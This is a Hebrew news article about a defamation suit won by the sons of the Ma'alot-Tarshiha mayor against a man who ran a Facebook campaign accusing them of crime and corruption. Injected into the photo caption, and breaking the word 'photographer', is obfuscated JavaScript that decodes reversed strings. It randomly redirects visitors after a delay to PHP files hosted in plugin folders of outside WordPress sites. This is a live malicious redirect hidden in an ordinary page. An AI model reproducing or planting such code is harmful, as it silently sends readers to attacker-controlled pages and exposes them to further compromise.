fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

בניו של שלמה בוחבוט זכו בתביעת לשון הרע

השניים יקבלו פיצוי בסך 45,000 ש"ח, מתושב העיר מעלות - תרשיחא, שניהל ברשת הפייסבוק קמפיין ממושך, אינטנסיבי ובוטה נגדם
לירוי וג'ונתן בוחבוט. צילום ג'ונתן בוחבוט: Starve photographer
לירוי וג'ונתן בוחבוט. צילום ג'ונתן בוחבוט: Starve pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tographer

ג'ונתן ולירוי בוחבוט, בניו של שלמה בוחבוט, ראש עיריית מעלות תרשיחא לשער, הגישו תביעת לשון הרע נגד שלומי אנידג'אר, שניהל ברשת הפייסבוק קמפיין ממושך, אינטנסיבי ובוטה נגד התובעים בפרט, ונגד משפחתם בכלל, תוך שהוא מתאר אותם, בין היתר, כמשפחת פשע, העושה במעלות-תרשיחא כבתוך שלה, ומייחס להם מעשי שחיתות ושליחת יד בכספי ציבור.
התובעים, אשר יוצגו על ידי עו"ד טל עברי ממשרד עורכי הדין עברי, קרנר ושות', טענו מצידם, כי כל פרסומיו של הנתבע הם בדיות, אשר ממילא לא נתמכו בכל ראיות, וכי הנתבע נהג בחוסר תום לב, הן מהטעם שעשה את הפרסומים אודות התובעים מבלי לאשש קודם את תוכנם, והן מהטעם שאף לאחר הגשת התביעה בתיק, לא זו בלבד שלא חדל מלהשמיץ את התובעים, אלא שפרסם אודותיהם עשרות פרסומים משמיצים נוספים.
הנתבע טען, כי הפרסומים נשוא התביעה אינם מגבשים לשון הרע, וככל שייקבע שיש בהם משום לשון הרע – עומדות לו הגנות אמת הפרסום ותום הלב.
שופטת בית משפט השלום בת"א דחתה את טענותיו של הנתבע, תוך שהיא מיישמת, בין היתר, את קביעת בית המשפט העליון לפיה הן תגובות לפוסטים ברשת הפייסבוק והן שיתוף בלבד של פוסטים, מהווים 'פרסום' כהגדרתו בחוק איסור לשון הרע.
התביעה שהגישו בניו של בוחבוט, עמדה על 200,000 ש"ח, והשופטת אמנם דחתה את טענותיו של הנתבע, אך קבעה בסופו של דבר כי יפוצו על ידו בסכום של 45,000 ש"ח בלבד, בצירוף שכר טרחה של עורך דין, בגובה 15% מסכום פסק הדין.
כך קובעת השופטת רונית פינצ'וק אלט בפסק הדין: "למעשה, למעט דבריו שלו, לא הביא הנתבע כל ראייה או עד התומכים בטענותיו החמורות כנגד התובעים, וממילא לא הוכיח אותן. אני דוחה את טענת הנתבע כי הדברים שפרסם היו אמת" בהמשך פסק הדין מוסיף בית המשפט "מחומר הראיות שלפני עולה כי הנתבע אינו חוסה תחת הגנת תום הלב מעצם כך שהתנהגותו אינה עולה על הדרישה לתום לב…הנתבע נקט בפרסומים בלשון בוטה ובהאשמות פליליות, והנתבע ביצע את הפרסומים בתפוצה רחבה ביותר, ומנגד לא טרח לפנות לרשויות שתפקידן לבדוק האשמות מסוג זה. הנתבע לא היה מעוניין בבירור האמת אלא בהפצת דברי בלע על התובעים ושעה שהתובעים אינם אנשי ציבור."
עו"ד טל עברי שייצג את האחים בוחבוט: "הזירה המקוונת בכלל, והרשתות החברתיות בפרט, הינן כיכר העיר המודרנית. פסק הדין הוא נדבך נוסף בהתאמת דיני לשון הרע לקדמה הטכנולוגית ולמטמורפוזה התרבותית שבעקבותיה, ומשמש ביטוי לחוסר הסובלנות ההולך וגובר של בתי המשפט כלפי אלה, ההופכים את הרשת החברתית לפלטפורמה לעשיית לינץ' מילולי ואת המקלדת לאמצעי לדריסת שמם הטוב של אחרים".

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות